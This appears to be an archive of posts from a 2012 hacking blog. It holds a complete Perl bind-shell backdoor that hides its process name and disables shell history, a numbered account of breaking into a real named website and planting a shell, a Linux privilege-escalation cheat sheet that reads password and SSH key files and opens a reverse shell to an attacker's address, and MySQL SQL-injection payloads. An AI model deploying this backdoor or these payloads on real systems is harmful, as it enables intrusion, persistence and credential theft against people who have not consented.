learn online with video tutorials…

Posted in Uncategorized on April 24, 2012 by peak

IT hardware basics:
http://www.professormesser.com/free-a-plus-training/220-701/professor-messers-free-220-70x-comptia-a-training-course/

IT network basics:
http://www.professormesser.com/n10-005/free-network-plus/

IT security basics:
http://www.professormesser.com/free-comptia-security-training/security-plus-videos/

Windows basics:
http://www.professormesser.com/microsoft-70-680/free-microsoft-70-680-training/

Mathematics & Physics:
http://www.khanacademy.org/

Learn Programming in c,obj-c,c++,c#,java
http://www.wibit.net/

Advertisements

Perl Backdoor with pty

Posted in r00ting on April 17, 2012 by peak

#!/usr/bin/perl
#
# Advanced perl backdoor
#
use warnings;
use strict;
use IO::Socket;
use IO::Select;
use POSIX;

my $PORT = 18082;
# perl -e ‚$pass=“yourpassword“; print crypt($pass,substr($pass,2)).“n“‚
my $PASSWORD = ‚pawQj8NmTbBGI‘;
my $SHELL = „/bin/sh“;
my $HOME = „/tmp“;
my $PROC = „/bin/sh“;
my $PROMPT = „P-> „;
my @STTY = (’sane‘, ‚echoe‘, ‚echoctl‘, ‚echoke‘, ‚-ixany‘);

$ENV{HOME} = $HOME;
$ENV{PS1} = ‚\u@\h:\w\$ ‚;
$ENV{PATH} = ‚/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/ucb‘;
$ENV{HISTFILE} = ‚/dev/null‘;
$ENV{USER} = ‚root‘;
$ENV{LOGNAME} = ‚root‘;
$ENV{LS_OPTIONS} = ‚ –color=auto -F -b -T 0‘;
$ENV{LS_COLORS} = ‚LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.avi=01;35:*.fli=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.flac=01;35:*.mp3=01;35:*.mpc=01;35:*.ogg=01;35:*.wav=01;35:‘;
$ENV{SHELL} = $SHELL;
$ENV{TERM} = ‚xterm‘;

$0 = $PROC.““;

$SIG{HUP} = ‚IGNORE‘;
$SIG{TERM} = ‚IGNORE‘;
$SIG{CHLD} = sub { wait; };

my %IOCTLDEF;
$IOCTLDEF{TIOCSWINSZ} = 0x5414;
$IOCTLDEF{TIOCNOTTY} = 0x5422;
$IOCTLDEF{TIOCSCTTY} = 0x540E;

#
# BSD
#
safeload(’sys/ttycom.ph‘, 1);
safeload(’sys/ioctl.ph‘, 1);
safeload(‚asm/ioctls.ph‘, 1);

foreach my $IOCTL (keys(%IOCTLDEF)) {
next if (defined());
#
# linux
#
if (open(IOD, „< /usr/include/asm/ioctls.h")) {
while() {
#if (/^#defines+$IOCTLs+(.*?)n$/) {
if (/^#define\s+$IOCTL\s+(.*?)\n$/) {
eval „sub $IOCTL () {$1;}“;
last;
}
}
close(IOD);
}
eval „sub $IOCTL () { $IOCTLDEF{$IOCTL};}“ unless (defined());
}

#
# NO DEFAULT PORT
#
$PORT = $ARGV[0] if ($ARGV[0]);

my $bind = IO::Socket::INET->new(Listen=>1, LocalPort=>$PORT, Proto=>“tcp“) or die „$!“;

defined(my $pid = fork)
or die „$!“;
exit if $pid;

my %CLIENT;
my $sel_serv = IO::Select->new($bind);
my $sel_shell = IO::Select->new();

#
# MAIN LOOP
#
while (1) {
select(undef,undef,undef, 0.3) if (scalar(keys(%CLIENT)) == 0);
read_clients();
read_shells();
}

sub read_clients {
map { read_client($_) } ($sel_serv->can_read(0.01));
}

sub read_shells {
map { read_shell($_) } ($sel_shell->can_read(0.01));
}

sub read_client {
my $fh = shift;
if ($fh eq $bind) {
my $newcon = $bind->accept;
$sel_serv->add($newcon);
$CLIENT{$newcon}->{senha} = 0;
$CLIENT{$newcon}->{sock} = $newcon;
$fh->autoflush(1);
do_client($newcon, ‚3‘, ‚5‘, ‚1‘);
sleep(1);
write_client($newcon, $PROMPT) if ($PROMPT);
} else {
my $msg;
my $nread = sysread($fh, $msg, 1024);
if ($nread == 0) {
close_client($fh);
} else {
telnet_parse($fh, $msg);
}
}
}

sub telnet_parse {
my ($cli, $msg) = @_;
my $char = (split(“, $msg))[0];
if (ord($char) == 255) {
chr_parse($cli, $msg);
} else {
if ($CLIENT{$cli}->{senha} == 0) {
$CLIENT{$cli}->{buf} .= $msg;
return() unless ($msg =~ /r|n/);
my $pass = $CLIENT{$cli}->{buf};
$CLIENT{$cli}->{buf} = “;
$pass =~ s/n//g;
$pass =~ s/0//g;
$pass =~ s/r//g;
if (crypt($pass, $PASSWORD) ne $PASSWORD) {
close_client($cli);
} else {
$CLIENT{$cli}->{senha} = 1;
write_client($cli, „\r\n\r“);
new_shell($cli);
}
return();
}
$msg =~ s/rn00//g;
$msg =~ s/0//g;
$msg =~ s/rn/n/g;
write_shell($cli, $msg);
}
}

sub read_shell {
my $shell = shift;
my $cli;
map { $cli = $CLIENT{$_}->{sock} if ($CLIENT{$_}->{shell} eq $shell) } keys(%CLIENT);
my $msg;
my $nread = sysread($shell, $msg, 1024);
unless (defined $nread) {
close_client($cli);
} else {
write_client($cli, $msg);
}
}

sub to_chr {
my $chrs = “;
map { $chrs .= chr($_) } (split(/ +/, shift));
return($chrs);
}

sub do_client {
my ($client, @codes) = @_;
map { write_client($client, chr(255).chr(251).chr($_)) } @codes;
}

sub chr_parse {
my ($client, $chrs) = @_;
my $ords = “;
map { $ords .= ord($_).‘ ‚ } (split(//, $chrs));
my $msg = “;

if ($ords =~ /255 250 31 (d+) (d+) (d+) (d+)/) {
my $winsize = pack(‚C4‘, $4, $3, $2, $1);
ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);# or die „$!“;
}

foreach my $code (split(„255 „, $ords)) {
if ($code =~ /(d+) (.*)$/) {
my $codes = $2;
if ($1 == 251) {
$msg .= chr(255).chr(253);
map { $msg .= chr($_) } (split(/ +/, $codes));
}
}
}
write_client($client, $msg) if ($msg);
return(1);
}

sub new_shell {
my $cli = shift;
POSIX::setpgid(0, 0);
my ($tty, $pty);
unless (($tty, $pty) = open_tty($cli)) {
finish_client($cli, „ERROR: No more pty’s avaliable\n“);
return(undef);
}
my $pid = fork();
if (not defined($pid)) {
finish_client($cli, „ERROR: fork()\n“);
return(undef);
}
unless($pid) {
close($pty);
local(*DEVTTY);
if (open (DEVTTY, „/dev/tty“)) {
ioctl(DEVTTY, &TIOCNOTTY, 0 );# or die „$!“;
close(DEVTTY);
}
POSIX::setsid();
ioctl($tty, &TIOCSCTTY, 0);# or die „$!“;

open (STDIN, „&“.fileno($tty)) or die „$!“;
open (STDERR, „>&“.fileno($tty)) or die „$!“;
close($tty);
sleep(1);
foreach my $stty („/bin/stty“, „/usr/bin/stty“) {
next unless (-x $stty);
map { system(„$stty“, $_) } @STTY;
}

chdir(„$HOME“);
{ exec(„$SHELL“) };
while (my $msg = ) {
$msg =~ s/n$//;
$msg =~ s/r$//;
system(„$msg 2>&1“);
}
exit;
}
close($tty);
select($pty); $|++;
select(STDOUT);
set_raw($pty);
$CLIENT{$cli}->{shell} = $pty;
$sel_shell->add($pty);
return(1);
}

sub set_raw($) {
my $self = shift;
return 1 if not POSIX::isatty($self);
my $ttyno = fileno($self);
my $termios = new POSIX::Termios;
unless ($termios) {
return undef;
}
unless ($termios->getattr($ttyno)) {
return undef;
}
$termios->setiflag(0);
$termios->setoflag(0);
$termios->setlflag(0);
$termios->setcc(&POSIX::VMIN, 1);
$termios->setcc(&POSIX::VTIME, 0);
unless ($termios->setattr($ttyno, &POSIX::TCSANOW)) {
return undef;
}
return 1;
}

sub open_tty {
no strict;
my $cli = shift;
my ($PTY, $TTY) = (*{„pty.$cli“}, *{„tty.$cli“});
for (my $i=0; $i $pty“));
my $tty = get_tty($i, „/dev/tty“);
unless(open($TTY, „+> $tty“)) {
close($PTY);
next;
}
return($TTY, $PTY);
}
return();
}

sub get_tty {
my ($num, $base) = @_;
my @series = (‚p‘ .. ‚z‘, ‚a‘ .. ‚e‘);
my @subs = (‚0‘ .. ‚9‘, ‚a‘ .. ‚f‘);
my $buf = $base;
$buf .= @series[($num >> 4) & 0xF];
$buf .= @subs[$num & 0xF];
return($buf);
}

sub safeload {
my ($module, $require, $arg) = @_;
my $file = $module;
$file =~ s/::///g;
if ($require) {
map { eval („require \“$_/$file\“;“) if(-f „$_/$file“); } @INC;
} else {
$file .= „.pm“ unless ($file =~ /(.pm|.ph)$/);
return(eval(„use $module $arg;“)) if (grep { -f „$_/$file“ } @INC);
}
return;
}

sub write_shell {
my ($cli, $msg) = @_;
my $shell = $CLIENT{$cli}->{shell};
return(undef) unless($shell);
foreach my $m (split_chars($msg, 20)) {
read_shells();
print $shell $m;
read_shells();
}
return(1);
}

sub split_chars {
no warnings;
my ($msg, $nchars) = @_;
my @splited;
my @chrs = split (“, $msg);
my $done = 0;
while (1) {
my $splited = join(“, @chrs[$done .. ($done+$nchars-1)]);
$done += $nchars;
last if (length($splited) {sock};

$sel_serv->remove($sock);
if ($CLIENT{$cli}->{shell}) {
my $shell = $CLIENT{$cli}->{shell};
$sel_shell->remove($shell);
close($shell);
}
$sock->close() if($sock);
delete($CLIENT{$cli});
}

sub write_client {
my ($cli, $msg) = @_;
my $sock = $CLIENT{$cli}->{sock};
syswrite($sock, $msg, length($msg)) if ($sock);
}

post exploitation pty shell

Posted in r00ting on März 5, 2012 by peak

python:

python -c 'import pty; pty.spawn("/bin/bash");'

expect:

#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh
interact

sh-3.2$ expect sh.exp

Hacking jusos aus dem Saarland

Posted in PHP Injection on Februar 15, 2012 by peak
http://bildung.jusos-saar.de/?file=

Ich werde mich stichwortartig kurz halten wie ich vorgegangen bin.

1. Safe Mod Restriction erkannt
2. restriction bis zum /var/www/web53/html/ ordner
3. trotzdem log files getestet um sicher zu sein, sowie einige config files oder sessions -> fehlanzeige
4. php input wrapper probiert
5. php base64 filter erfolgreich auf die index.php
6. base64 code decoded, index source gelesen -> db_oeffnen.inc.php gefunden
7. db_oeffnen.inc.php wieder included und wieder base64 code decodiert
8. das hier gefunden:

$host=“localhost“;
$dbuser=“web53″;
$dbpwd=“zensiert“;
$dbname=“usr_web53_2″;

9. nmap scan des Servers -> 3306/tcp open mysql
10. versucht mit mysql client auf den server zu verbinden -> fehlanzeige
11. selbiges über ssh versucht
12. sqli lücke auf der seite gesucht und nach 10s gefunden
13. über mysql lücke outfile machen wollen aber mysql quotes sind enabled also funktioniert das auch nicht
14. user registriert, konnte nicht aktiviert werden
15. sqli admin table etc auslesen
16. admin md5 hash mit bekannten online md5 cracker herausgefunden
16. admin login suchen und mich nicht austricken lassen /admin/ -> fail, /admin/login.php
17. admin bereich nach upload möglichkeiten gesucht
18. nach ein paar versuchen gemerkt das das panel so verbugt ist das es wieder sicher ist,
19. mein registrierter user aktiviert und im user panel nach upload möglichkeit gesucht, nix gefunden
20. source code über die lfi angeschaut und den Fehler gesucht
21. gemerkt das es am safe mode liegt
22. phpmyadmin gesucht
23. phpmyadmin.jusos-saar.de hosting panel gefunden
24. login aus der source genommen. -> funktioniert.
25. bissl rumschnuppern …
26. webFTP, shell hochgeladen
27. erkannt das 10 domanis auf dem server sind, sowie zugriff auf alle mails der örtiegn usos und ftp und und und und …
28. Januar 2012 Monthly Totals Visits:10158 Hits: 199200
29. passwort in diesem Beitrag zensiert
30. neue email adresse erstellt
31. über webMail den admin sowie das Büro informiert

Basic Linux Privilege Escalation

Posted in r00ting on Januar 31, 2012 by peak

following article is from g0tmi1k! I don’t take any credits. Visit his Blog: http://g0tmi1k

 
Before starting, I would like to point out – I’m no expert. As far as I know, there isn’t a „magic“ answer, in this huge area. This is simply my finding, typed up, to be shared (my starting point). Below is a mixture of commands to do the same thing, to look at things in a different place or just a different light. I know there more „things“ to look for. It’s just a basic & rough guide. Not every command will work for each system as Linux varies so much. „It“ will not jump off the screen – you’ve to hunt for that „little thing“ as „the devil is in the detail“.

Enumeration is the key.
(Linux) privilege escalation is all about:

Collect – Enumeration, more enumeration and some more enumeration.
Process – Sort through data, analyse and prioritisation.
Search – Know what to search for and where to find the exploit code.
Adapt – Customize the exploit, so it fits. Not every exploit work for every system „out of the box“.
Try – Get ready for (lots of) trial and error.

Operating System
What’s the distribution type? What version?
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release

What’s the Kernel version? Is it 64-bit?
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

What can be learnt from the environmental variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Is there a printer?
lpstat -a

Applications & Services
What services are running? Which service has which user privilege?
ps aux
ps -ef
top
cat /etc/service

Which service(s) are been running by root? Of these services, which are vulnerable – it’s worth a double check!
ps aux | grep root
ps -ef | grep root

What applications are installed? What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk ‚$1 ~ /^.*r.*/

What jobs are scheduled?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 „password“ [filename]
find . -name „*.php“ -print0 | xargs -0 grep -i -n „var $password“   # Joomla

Communications & Networking
What NIC(s) does the system have? Is it connected to another network?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig –list
chkconfig –list | grep 3:on
last
w

Whats cached? IP and/or MAC addresses
arp -e
route
/sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic
# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21

Have you got a shell? Can you interact with the system?
# http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
nc -lvp 4444    # Attacker. Input (Commands)
nc -lvp 4445    # Attacker. Ouput (Results)
telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445    # On the targets system. Use the attackers IP!

Is port forwarding possible? Redirect and interact with traffic from another view
# rinetd
# http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch

# fpipe
# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port

# mknod backpipe p ; nc -l -p [remote port] < backpipe  | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe    # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)

Is tunnelling possible? Send commands locally, remotely
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig

Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
id
who
w
last
cat /etc/passwd | cut -d:    # List of users
grep -v -E „^#“ /etc/passwd | awk -F: ‚$3 == 0 { print $1}‘   # List of super users
awk -F: ‚($3 == „0“) {print}‘ /etc/passwd   # List of super users
cat /etc/sudoers
sudo -l

What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

Anything „interesting“ in the home directorie(s)? If it’s possible to access
ls -ahlR /root/
ls -ahlR /home/

Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

What has the user being doing? Is there any password in plain text? What have they been edting?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root

Can private-key information be found?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

File Systems
Which configuration files can be written in /etc/? Able to reconfigure a service?
ls -aRl /etc/ | awk ‚$1 ~ /^.*w.*/‘ 2>/dev/null     # Anyone
ls -aRl /etc/ | awk ‚$1 ~ /^..w/‘ 2>/dev/null        # Owner
ls -aRl /etc/ | awk ‚$1 ~ /^…..w/‘ 2>/dev/null    # Group
ls -aRl /etc/ | awk ‚$1 ~ /w.$/‘ 2>/dev/null          # Other

find /etc/ -readable -type f 2>/dev/null                         # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone

What can be found in /var/ ?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases

Any settings/files (hidden) on website? Any settings file with database information?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/

Is there anything in the log file(s) (Could help with „Local File Includes“!)
# http://www.thegeekstuff.com/2011/08/linux-var-log-files/
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp

If commands are limited, you break out of the „jail“ shell?
python -c ‚import pty;pty.spawn(„/bin/bash“)‘
echo os.system(‚/bin/bash‘)
/bin/sh -i

How are file-systems mounted?
mount
df -h

Are there any unmounted file-systems?
cat /etc/fstab

What „Advanced Linux File Permissions“ are used? Sticky bits, SUID & GUID
find / -perm -1000 -type d 2>/dev/null    # Sticky bit – Only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) – run as the  group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) – run as the  owner, not the user who started it.

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
for i in `locate -r „bin$“`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in ‚common‘ places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

Where can written to and executed from? A few ‚common‘ places: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null        # world-writeable folders
find / -perm -222 -type d 2>/dev/null      # world-writeable folders
find / -perm -o+w -type d 2>/dev/null    # world-writeable folders

find / -perm -o+x -type d 2>/dev/null    # world-executable folders

find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null   # world-writeable & executable folders

Any „problem“ files? Word-writeable, „nobody“ files
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable files
find /dir -xdev \( -nouser -o -nogroup \) -print   # Noowner files

Preparation & Finding Exploit Code
What development tools/languages are installed/supported?
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc

How can files be uploaded?
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp

Finding exploit code
http://www.exploit-db.com
http://1337day.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com

Finding more information regarding the exploit
http://www.cvedetails.com
http://packetstormsecurity.org/files/cve/%5BCVE%5D
http://cve.mitre.org/cgi-bin/cvename.cgi?name=%5BCVE%5D
http://www.vulnview.com/cve-details.php?cvename=%5BCVE%5D

(Quick) „Common“ exploits. Warning. Pre-compiled binaries files. Use at your own risk
http://tarantula.by.ru/localroot/
http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/

Mitigations
Is any of the above information easy to find?
Try doing it!
Setup a cron job which automates script(s) and/or 3rd party products

Is the system fully patched? Kernel, operating system, all applications, their  plugins and web services
apt-get update && apt-get upgrade
yum update

Are services running with the minimum level of privileges required?
For example, do you need to run MySQL as root?

Scripts Can any of this be automated?!
http://pentestmonkey.net/tools/unix-privesc-check/
http://labs.portcullis.co.uk/application/enum4linux/
http://bastille-linux.sourceforge.net

Other (quick) guides & Links
Enumeration
http://www.0daysecurity.com/penetration-testing/enumeration.html
http://www.microloft.co.uk/hacking/hacking3.htm

Misc
http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf
http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf
http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html

rooting Samsung Galaxy Note (GT-N7000)

Posted in Android on Januar 23, 2012 by peak

1. Get Stock ROM from Samsung that is rootable & odin

http://www.sammobile.com/

the zergRush Exploit should work with every model <= KL3, so get that Image e.g I’m working with KKA. Next Get Odin to flash stock roms (dont flash custom rom, it will increase an inner counter)

http://forum.xda-developers.com/attachment.php?attachmentid=815370&stc=1&d=1323799721

2. Downgrade your Galaxy Notewith odin  to that rootable stock Rom you just downloaded

Make sure USB Debbuging is enabled. Include your rom in „pda“. It’s simple ..

3. Download drivers and the zergRush Exploit

http://downloadandroidrom.com/file/GalaxyNote/rooting/Samsung_USB_Driver_for_Moblie_Phones_v1_4_6_0.exe

password: samfirmware.com

http://downloadandroidrom.com/file/GalaxyNote/rooting/GalaxyNoteRoot.zip

4. root your device

Make sure USB Debbuging is enabled.

Connect your phone with your computer (it should get acknowledged!)

Make sure your USB Memory is connected (swipe down the menu and tap on the connect usb)

run the zerg exploit (simple, check the zip file. I’m using DooMLoRD_v4_ROOT-zergRush)

5. install manually ClockworkMod Recovery (you need it to flash custom roms

Download http://downloadandroidrom.com/file/GalaxyNote/recovery/GalaxyNoteRecovery.zip

now swap to your shell/cmd (i’m on win7 atm.)

cd \GalaxyNoteRecovery

adb devices

adb push KKA\zImage /data/local/zImage

adb shell

su
dd if=/data/local/zImage of=/dev/block/mmcblk0p5 bs=4096
rm /data/local/zImage
reboot

6. Congratz! You are root, now lets update to newest StockRom

You can do that wth mobile odin pro.apk or with the just installed CWM Recovery.

Odin:
Download MobileOdin Pro and your uptodate Stock Rom (extract it) and copy both, the .apk and the .md5 file, in the root directory of your phone (disable usb debugging for this and use windows explorer). It is also possible hat you have 3 files instead of .md5!
Now Keep the everroot option enabled. flash. done.

CWM:
Copy your rom on root (.md5 files or more). Open CWM and „Flash Stock Firmware“ if you just got md5 always take that when asked. And when asked choose „Keep CF-Root Kernel“. Done.

Some Exotic MySQL Magic

Posted in SQL Injection on Januar 21, 2012 by peak

MySQL Columns/Tables herausfinden in v4.x mit error report on

‘ AND (SELECT * FROM USER_TABLE) = (1)– –

MySQL answer:
“Operand should contain 7 column(s)”

‘ AND (1,2,3,4,5,6,7) = (SELECT * FROM USER_TABLE UNION SELECT 1%0,2,3,4,5,6,7 LIMIT 1)– –

MySQL answer:
“Column ‘usr_u_id’ cannot be null”

SELECT id, name, pass FROM users WHERE id = 1 PROCEDURE ANALYSE()

you have to see the first column output: testdb.users.id

MySQL Error based SQL Injection

select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;

/?param=and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)–

/?param=(1)and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)–